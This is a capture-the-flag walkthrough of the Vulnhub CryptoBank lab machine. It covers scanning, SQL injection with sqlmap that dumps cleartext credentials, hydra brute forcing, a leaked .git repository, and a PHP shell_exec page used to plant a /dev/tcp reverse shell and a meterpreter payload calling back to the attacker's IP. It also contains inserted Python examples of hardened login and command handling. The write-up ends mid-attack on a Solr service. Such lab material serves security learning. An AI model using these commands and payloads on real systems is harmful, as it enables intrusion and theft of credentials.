Vulnhub: CryptoBank Machine, Detailed Walkthrough
CryptoBank
Identify the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:03 1 60 Unknown vendor
192.168.56.100 08:00:27:1f:96:d2 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:d0:df:39 1 60 PCS Systemtechnik GmbH
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-03 22:11 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f4e59dfb75549cfd3122d19010543f7 (RSA)
| 256 5e1b3798abc7e6ee5ff8df4314de284e (ECDSA)
|_ 256 8ea9909f6e51b1c726ea07ac6928b31c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: CryptoBank
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:D0:DF:39 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Getting a shell
A hosts entry has to be added before the login and register pages can be reached.
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 cryptobank.local
Registration is currently closed.
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ nikto -h http://192.168.56.254
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-06-03 22:19:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 82f7, size: 5a30acd90b6ab, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8255 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-06-03 22:19:57 (GMT-4) (14 seconds)
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,html,sh,js
[+] Timeout: 10s
===============================================================
2023/06/03 22:20:22 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 33527]
/.html (Status: 403) [Size: 279]
/index.js (Status: 200) [Size: 458095]
/info.php (Status: 200) [Size: 86157]
/assets (Status: 301) [Size: 317] [--> http://192.168.56.254/assets/]
/development (Status: 401) [Size: 461]
/trade (Status: 301) [Size: 316] [--> http://192.168.56.254/trade/]
/closed.html (Status: 200) [Size: 65]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
The /development directory is protected by HTTP basic authentication. Tried to crack it with hydra, without success.
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.56.254 http-get /development
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Noticed that each member in the Team section of the page has a contact button; the URLs shown in the browser address bar can be used to build a list of usernames,
for example:
http://cryptobank.local/william.d
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat users_list
william.d
julius.b
bill.w
john.d
Intercept the login request with Burp Suite, save it as req.txt, then test it for SQL injection:
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ ls
hydra.restore nmap_full_scan req.txt users_list
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3
POST parameter 'user' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap confirms that the user parameter is SQL-injectable. Next, dump the database information:
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 --dbs
available databases [5]:
[*] cryptobank
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 -D cryptobank --tables
Database: cryptobank
[3 tables]
+----------+
| accounts |
| comments |
| loans |
+----------+
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 -D cryptobank -T accounts --columns
Database: cryptobank
Table: accounts
[4 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| balance | int(11) |
| id_account | int(11) |
| password | varchar(100) |
| username | varchar(50) |
+------------+--------------+
Turn the usernames and passwords returned by sqlmap into two separate dictionaries.
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sqlmap -r req.txt --level=3 -D cryptobank -T accounts -C username,password --dump
Database: cryptobank
Table: accounts
[12 entries]
+--------------------+------------+
| username | password |
+--------------------+------------+
| spongebob | 3mwZd896Me |
| bill.w | 3Nrc2FYJMe |
| deadbeef | 6X7DnLF5pG |
| dreadpirateroberts | 7HwAEChFP9 |
| notanirsagent | 8hPx2Zqn4b |
| williamdelisle | gFG7pqE5cn |
| buzzlightyear | LnBHvEhmw3 |
| mrbitcoin | LxZjkK87nu |
| johndl33t | NqRF4W85yf |
| juliusthedeveloper | wJWm4CgV26 |
| patric | x8CRvHqgPp |
| tim | zm2gBcaxd3 |
+--------------------+------------+
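The sqlmap result above (the user parameter is injectable) and this dump (passwords stored in cleartext, so a single table read yields working credentials) are two symptoms of the same login code. The Python below is an added example, not code from the box or from this write-up: it models the accounts table in SQLite with the columns sqlmap listed, shows a string-built login of the kind sqlmap reported beside a parameterised one, and replaces cleartext storage with salted PBKDF2 and a constant-time check. How the box's PHP builds its query and the `' -- ` bypass are assumptions; the two credential rows are taken from the dump above.

```python
import hashlib
import hmac
import os
import sqlite3

# Two rows from the sqlmap dump above; the passwords are the cleartext values the box stores.
SAMPLE_CREDENTIALS = [
    ("bill.w", "3Nrc2FYJMe"),
    ("juliusthedeveloper", "wJWm4CgV26"),
]

PBKDF2_ITERATIONS = 200_000


def hash_password(password: str) -> str:
    """Salted PBKDF2-HMAC-SHA256; the stored string carries its own parameters."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(stored: str, password: str) -> bool:
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))  # constant-time


def make_db(hashed: bool) -> sqlite3.Connection:
    """In-memory table with the same columns sqlmap listed for cryptobank.accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (id_account INTEGER PRIMARY KEY, username VARCHAR(50), "
        "password VARCHAR(100), balance INTEGER)"
    )
    for user, pw in SAMPLE_CREDENTIALS:
        conn.execute(
            "INSERT INTO accounts (username, password, balance) VALUES (?, ?, 0)",
            (user, hash_password(pw) if hashed else pw),
        )
    return conn


def vulnerable_login(conn, user, password):
    """Login built by string concatenation (assumed shape of the bug sqlmap found on 'user')."""
    query = (
        f"SELECT username FROM accounts WHERE username = '{user}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def safe_login(conn, user, password):
    """Parameterised lookup plus hash verification: input never reaches the SQL parser."""
    row = conn.execute(
        "SELECT username, password FROM accounts WHERE username = ?", (user,)
    ).fetchone()
    if row is None or not verify_password(row[1], password):
        return None
    return row[0]


def dump_passwords(conn):
    """What a table dump like the sqlmap one above hands an attacker."""
    return [pw for (pw,) in conn.execute("SELECT password FROM accounts ORDER BY id_account")]


if __name__ == "__main__":
    vuln, safe = make_db(hashed=False), make_db(hashed=True)
    print("vulnerable, tautology user:", vulnerable_login(vuln, "bill.w' -- ", "wrong"))
    print("safe, same input:", safe_login(safe, "bill.w' -- ", "wrong"))
    print("safe dump:", dump_passwords(safe))
```

With the parameterised version, sqlmap's injection finds nothing to inject into, and a dump of the table yields only per-user salted hashes, so the password.dict step above would not be possible from the database alone.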
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat user.dict
spongebob
bill.w
deadbeef
dreadpirateroberts
notanirsagent
williamdelisle
buzzlightyear
mrbitcoin
johndl33t
juliusthedeveloper
patric
tim
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat password.dict
3mwZd896Me
3Nrc2FYJMe
6X7DnLF5pG
7HwAEChFP9
8hPx2Zqn4b
gFG7pqE5cn
LnBHvEhmw3
LxZjkK87nu
NqRF4W85yf
wJWm4CgV26
x8CRvHqgPp
zm2gBcaxd3
Also append the usernames collected earlier to user.dict.
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ cat users_list >> user.dict
Since the basic authentication on /development was not cracked earlier, try again with the dictionaries built from the database passwords and usernames:
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ hydra -L user.dict -P password.dict -s 80 -f 192.168.56.254 http-get /development
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-03 23:23:51
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 192 login tries (l:16/p:12), ~12 tries per task
[DATA] attacking http-get://192.168.56.254:80/development
[80][http-get] host: 192.168.56.254 login: julius.b password: wJWm4CgV26
[STATUS] attack finished for 192.168.56.254 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-03 23:24:03
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ dirb http://192.168.56.254/development/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jun 3 23:25:37 2023
URL_BASE: http://192.168.56.254/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.254/development/ ----
(!) WARNING: All responses for this directory seem to be CODE = 401.
(Use mode '-w' if you want to scan it anyway)
Scan /development again with the username and password found:
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ dirb http://192.168.56.254/development/ -u julius.b:wJWm4CgV26
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jun 3 23:27:42 2023
URL_BASE: http://192.168.56.254/development/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
AUTHORIZATION: julius.b:wJWm4CgV26
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.254/development/ ----
==> DIRECTORY: http://192.168.56.254/development/backups/
+ http://192.168.56.254/development/index.html (CODE:200|SIZE:21)
+ http://192.168.56.254/development/php.ini (CODE:200|SIZE:109)
==> DIRECTORY: http://192.168.56.254/development/tools/
---- Entering directory: http://192.168.56.254/development/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.254/development/tools/ ----
+ http://192.168.56.254/development/tools/index.php (CODE:403|SIZE:689)
==> DIRECTORY: http://192.168.56.254/development/tools/Resources/
---- Entering directory: http://192.168.56.254/development/tools/Resources/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Jun 3 23:27:48 2023
DOWNLOADED: 9224 - FOUND: 3
Under /development/ the subdirectories /backups/ and /tools/ were found.
http://cryptobank.local/development/backups/home/
The /home directory needs to be scanned further.
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ dirb http://cryptobank.local/development/backups/home/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jun 3 23:30:03 2023
URL_BASE: http://cryptobank.local/development/backups/home/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://cryptobank.local/development/backups/home/ ----
+ http://cryptobank.local/development/backups/home/.git/HEAD (CODE:200|SIZE:23)
+ http://cryptobank.local/development/backups/home/.htaccess (CODE:200|SIZE:12)
==> DIRECTORY: http://cryptobank.local/development/backups/home/assets/
==> DIRECTORY: http://cryptobank.local/development/backups/home/development/
+ http://cryptobank.local/development/backups/home/index.html (CODE:200|SIZE:33603)
==> DIRECTORY: http://cryptobank.local/development/backups/home/trade/
---- Entering directory: http://cryptobank.local/development/backups/home/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://cryptobank.local/development/backups/home/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://cryptobank.local/development/backups/home/trade/ ----
+ http://cryptobank.local/development/backups/home/trade/index.php (CODE:403|SIZE:689)
-----------------
END_TIME: Sat Jun 3 23:30:08 2023
DOWNLOADED: 9224 - FOUND: 4
A /.git directory was found.
Next, use the GitHack tool:
┌──(kali㉿kali)-[~/Toolsets/GitHack]
└─$ python GitHack.py http://cryptobank.local/development/backups/home/.git/
┌──(kali㉿kali)-[~/Toolsets/GitHack]
└─$ cd cryptobank.local
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local]
└─$ ls -alh
total 560K
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 .
drwxr-xr-x 7 kali kali 4.0K Jun 3 23:31 ..
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 assets
-rw-r--r-- 1 kali kali 65 Jun 3 23:31 closed.html
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 development
-rw-r--r-- 1 kali kali 260 Jun 3 23:31 dev-notes.txt
-rw-r--r-- 1 kali kali 66 Jun 3 23:31 .gitattributes
-rw-r--r-- 1 kali kali 33K Jun 3 23:31 index.html
-rw-r--r-- 1 kali kali 448K Jun 3 23:31 index.js
-rw-r--r-- 1 kali kali 5.3K Jun 3 23:31 ninjacheck.php
drwxr-xr-x 8 kali kali 4.0K Jun 3 23:31 ninjafirewall
-rw-r--r-- 1 kali kali 29K Jun 3 23:31 style.css
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 trade
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local]
└─$ cd development
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local/development]
└─$ ls -alh
total 24K
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 .
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 ..
-rw-r--r-- 1 kali kali 154 Jun 3 23:31 .htaccess
-rw-r--r-- 1 kali kali 109 Jun 3 23:31 php.ini
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 tools
-rw-r--r-- 1 kali kali 109 Jun 3 23:31 .user.ini
┌──(kali㉿kali)-[~/Toolsets/GitHack/cryptobank.local/development]
└─$ cd tools
┌──(kali㉿kali)-[~/…/GitHack/cryptobank.local/development/tools]
└─$ ls -alh
total 32K
drwxr-xr-x 6 kali kali 4.0K Jun 3 23:31 .
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 ..
drwxr-xr-x 2 kali kali 4.0K Jun 3 23:31 CommandExecution
drwxr-xr-x 3 kali kali 4.0K Jun 3 23:31 FileInclusion
drwxr-xr-x 2 kali kali 4.0K Jun 3 23:31 FileUpload
-rw-r--r-- 1 kali kali 1014 Jun 3 23:31 homepage.html
-rw-r--r-- 1 kali kali 62 Jun 3 23:31 index.php
drwxr-xr-x 2 kali kali 4.0K Jun 3 23:31 Resources
┌──(kali㉿kali)-[~/…/GitHack/cryptobank.local/development/tools]
└─$ cd CommandExecution
┌──(kali㉿kali)-[~/…/cryptobank.local/development/tools/CommandExecution]
└─$ ls
commandexec.html CommandExec.php
┌──(kali㉿kali)-[~/…/cryptobank.local/development/tools/CommandExecution]
└─$ cat CommandExec.php
<html>
<head>
<title>CommandExec-1</title>
</head>
<body>
<div style="background-color:#afafaf;padding:15px;border-radius:20px 20px 0px 0px">
<button type="button" name="homeButton" onclick="location.href='../homepage.html';">Home Page</button>
<button type="button" name="mainButton" onclick="location.href='commandexec.html';">Main Page</button>
</div>
<div style="background-color:#c9c9c9;padding:20px;">
<h1 align="center">Auth to execute system command</h1>
<form align="center" action="CommandExec.php" method="$_GET">
<label align="center">Username:</label><br>
<input align="center" type="text" name="username" value=""><br>
<label>Password:</label><br>
<input align="center" type="password" name="password" value=""><br>
<input align="center" type="submit" value="Submit">
</form>
</div>
<div style="background-color:#ecf2d0;padding:20px;border-radius:0px 0px 20px 20px" align="center">
<?php
if(isset($_GET["username"])){
//echo shell_exec($_GET["username"]);
if($_GET["password"] == "wJWm4CgV26")
echo shell_exec($_GET["username"]);
}
?>
</div>
</body>
</html>
So the path /development/tools/ can be accessed.
From CommandExec.php we learn that as long as the password entered is wJWm4CgV26, the command is executed through shell_exec, with the username parameter used as the command.
Confirmed that commands execute correctly.
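CommandExec.php passes the username field straight to shell_exec once the password matches, so the password check is the only thing between a request and a shell, and a password already exposed by the database dump and the basic-auth realm defeats it. The Python below is an added example written for this walkthrough, not the box's code: it keeps a password gate but compares in constant time, and it replaces free-form command text with an allow-list of fixed argv vectors run without a shell. The tool names and the argument carrying the expected password are assumptions; in a deployment the secret would come from configuration rather than a literal in the page source as in CommandExec.php.

```python
import hmac
import subprocess

# Allow-listed actions, each mapped to a fixed argv. The caller picks a name and
# never supplies command text. (Constructed list for this example.)
ALLOWED_TOOLS = {
    "kernel": ["uname", "-r"],
    "whoami": ["whoami"],
    "date": ["date", "-u"],
}


def password_ok(supplied: str, expected: str) -> bool:
    # Constant-time comparison in place of the PHP `==`, so response timing does
    # not leak how many leading characters of the guess were right.
    return hmac.compare_digest(supplied.encode(), expected.encode())


def run_tool(name: str, supplied_password: str, expected_password: str) -> str:
    """Hardened counterpart of CommandExec.php: authenticate, then run only a
    pre-approved argv with no shell, so input can never become a command."""
    if not password_ok(supplied_password, expected_password):
        raise PermissionError("authentication failed")
    argv = ALLOWED_TOOLS.get(name)
    if argv is None:
        # Anything not in the table, including "uname -r; id", is rejected here
        # rather than interpreted.
        raise ValueError(f"not an allowed tool: {name!r}")
    result = subprocess.run(argv, capture_output=True, text=True, timeout=5, check=False)
    return result.stdout.strip()


if __name__ == "__main__":
    secret = "example-only"  # assumption: would be read from configuration
    print(run_tool("kernel", secret, secret))
    try:
        run_tool("kernel; id", secret, secret)
    except ValueError as exc:
        print("rejected:", exc)
```

Because argv is a list and `shell=True` is never used, the wget and bash steps that follow in the write-up have no way in: there is no string for a shell to parse, only a fixed program with fixed arguments.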
Entering nc -e /bin/bash 192.168.56.253 5555 directly in username returns an error.
Instead, create a shell script on Kali Linux and upload it to the target with wget.
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ msfvenom -p cmd/unix/reverse_bash LHOST=192.168.56.253 LPORT=5555 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 78 bytes
bash -c '0<&191-;exec 191<>/dev/tcp/192.168.56.253/5555;sh <&191 >&191 2>&191'
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ echo '0<&191-;exec 191<>/dev/tcp/192.168.56.253/5555;sh <&191 >&191 2>&191' > revshell.sh
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Then enter wget http://192.168.56.253:8000/revshell.sh in username.
Use ls to check whether the upload succeeded.
Upload succeeded.
Then enter bash revshell.sh in username.
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.253] from (UNKNOWN) [192.168.56.254] 38662
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cryptobank:/var/www/cryptobank/development/tools/CommandExecution$ cd /home
<tobank/development/tools/CommandExecution$ cd /home
www-data@cryptobank:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Apr 10 2020 .
drwxr-xr-x 24 root root 4.0K Apr 10 2020 ..
drwxr-xr-x 5 cryptobank cryptobank 4.0K Apr 16 2020 cryptobank
www-data@cryptobank:/home$ cd cryptobank
cd cryptobank
www-data@cryptobank:/home/cryptobank$ ls -alh
ls -alh
total 52K
drwxr-xr-x 5 cryptobank cryptobank 4.0K Apr 16 2020 .
drwxr-xr-x 3 root root 4.0K Apr 10 2020 ..
-rw------- 1 cryptobank cryptobank 11 Apr 16 2020 .bash_history
-rw-r--r-- 1 cryptobank cryptobank 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 cryptobank cryptobank 3.7K Apr 4 2018 .bashrc
drwx------ 2 cryptobank cryptobank 4.0K Apr 10 2020 .cache
-rw-r--r-- 1 root root 26 Apr 11 2020 .gitconfig
drwx------ 3 cryptobank cryptobank 4.0K Apr 10 2020 .gnupg
drwxrwxr-x 3 cryptobank cryptobank 4.0K Apr 10 2020 .local
-rw------- 1 root root 1.7K Apr 11 2020 .mysql_history
-rw-r--r-- 1 cryptobank cryptobank 807 Apr 4 2018 .profile
-rw-r--r-- 1 cryptobank cryptobank 0 Apr 10 2020 .sudo_as_admin_successful
-rw-rw-r-- 1 cryptobank cryptobank 169 Apr 11 2020 .wget-hsts
-rwxrwxrwx 1 cryptobank cryptobank 28 Apr 16 2020 flag.txt
www-data@cryptobank:/home/cryptobank$ cat flag.txt
cat flag.txt
flag{l4szl0h4ny3cz1smyh3r0}
www-data@cryptobank:/home/cryptobank$
Upgrading to meterpreter
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.253 LPORT=6666 -f elf -o esclate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: esclate.elf
┌──(kali㉿kali)-[~/Vulnhub/CryptoBank]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LHOST 192.168.56.253
LHOST => 192.168.56.253
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.253:6666
[*] Sending stage (3045348 bytes) to 192.168.56.254
[*] Meterpreter session 1 opened (192.168.56.253:6666 -> 192.168.56.254:48398) at 2023-06-04 00:05:17 -0400
meterpreter > netstat -tunlp
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 127.0.0.53:53 0.0.0.0:* LISTEN 101 0
tcp 0.0.0.0:22 0.0.0.0:* LISTEN 0 0
tcp 172.17.0.1:8983 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.1:3306 0.0.0.0:* LISTEN 111 0
tcp 192.168.56.254:38688 192.168.56.253:5555 ESTABLISHED 33 0
tcp 192.168.56.254:48398 192.168.56.253:6666 ESTABLISHED 33 0
tcp :::22 :::* LISTEN 0 0
tcp :::80 :::* LISTEN 0 0
tcp ::ffff:192.168.56.254:80 ::ffff:192.168.56.253:39188 ESTABLISHED 33 0
tcp ::ffff:192.168.56.254:80 ::ffff:192.168.56.253:36640 CLOSE_WAIT 33 0
udp 127.0.0.53:53 0.0.0.0:* 101 0
udp 192.168.56.254:68 0.0.0.0:* 100 0
Port 8983 is found listening.
meterpreter > run autoroute --help
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[-] Missing -s (subnet) option
meterpreter > run autoroute -s 172.17.0.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.17.0.0/255.255.255.0...
[+] Added route to 172.17.0.0/255.255.255.0 via 192.168.56.254
[*] Use the -p option to list all active routes
To look at the service on port 8983, create a port forward (172.17.0.1 is the local address on the container network):
meterpreter > portfwd add -l 81 -p 8983 -r 172.17.0.1
[*] Forward TCP relay created: (local) :81 -> (remote) 172.17.0.1:8983
Then open http://127.0.0.1:81 in the browser on Kali Linux.
It is running a Solr service; search for exploit code:
msf6 exploit(multi/handler) > search solr
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/solr_velocity_rce 2019-10-29 excellent Yes Apache Solr Remote Code Execution via Velocity Template
1 auxiliary/scanner/http/log4shell_scanner 2021-12-09 normal No Log4Shell HTTP Scanner
2 exploit/linux/http/trendmicro_websecurity_exec 2020-06-10 excellent Yes Trend Micro Web Security (Virtual Appliance) Remote Code Execution
Guess that the Solr password is solr.